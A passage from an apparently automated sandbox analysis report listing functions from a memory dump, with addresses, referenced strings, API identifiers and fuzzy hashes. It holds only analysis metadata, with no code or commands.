                • Instruction ID: d7ec1faf01a76c3f783997073351ffcdc401e5aced1dd8971c03687a70b0188e
                • Opcode Fuzzy Hash: f0de20c509b078644209f733e27839bb99cf48c05e178ed846b3bb60ac5024cc
                • Instruction Fuzzy Hash: 2B4108353007024FD721DE2AC850B67B7E5EF94715F10092EFA56D77A0D731E8068B95
                Function 0140B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                Download Yara Rule
                APIs
                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0144728C
                Strings
                • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01447294
                • RTL: Re-Waiting, xrefs: 014472C1
                • RTL: Resource at %p, xrefs: 014472A3
                Memory Dump Source
                • Source File: 00000007.00000002.2389202000.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_13a0000_x.jbxd
                Similarity
                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                • API String ID: 885266447-605551621
                • Opcode ID: 12f6acb1e37e2302bb38b559452dc92bdd9850f6241f59b072544734311cb75d
                • Instruction ID: a8c4cfabe4b980d3123230703b8fdbb2c96d342b24a66cc8be0d5a6c4558e4f8
                • Opcode Fuzzy Hash: 12f6acb1e37e2302bb38b559452dc92bdd9850f6241f59b072544734311cb75d
                • Instruction Fuzzy Hash: 3441F235700206ABE721CF2ACC41B6AB7A5FB64715F10062EF955AB3A0DB31F84687D5
                Function 01417D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                Download Yara Rule
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000007.00000002.2389202000.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_13a0000_x.jbxd
                Similarity
                • API ID: __aulldvrm
                • String ID: +$-
                • API String ID: 1302938615-2137968064
                • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                • Instruction ID: 6e391b464fa4c89cc5f52d2e3c7093b9e312592fd446622bf6acee3ea0bb7341
                • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                • Instruction Fuzzy Hash: 5B91C071E4020A9BEF24CF6DC890ABFBBE1AF44322F64451BE955E73E8D73099418B51
                Function 013D9126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000007.00000002.2389202000.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_13a0000_x.jbxd
                Similarity
                • API ID:
                • String ID: $$@
                • API String ID: 0-1194432280
                • Opcode ID: e1aed9049e6ac69d6f305c14b9fbe5fa25c2fd8b7c6ce6cf939147179abf1810
                • Instruction ID: e105518b1c83e12ce428097e8f95bc7b1b2c4f0fbefa72988960533761190b32
                • Opcode Fuzzy Hash: e1aed9049e6ac69d6f305c14b9fbe5fa25c2fd8b7c6ce6cf939147179abf1810
                • Instruction Fuzzy Hash: 07810B72D002699BDB35CB54CC45BEEB7B8AF58714F0041DAEA19B7290D7705E85CFA0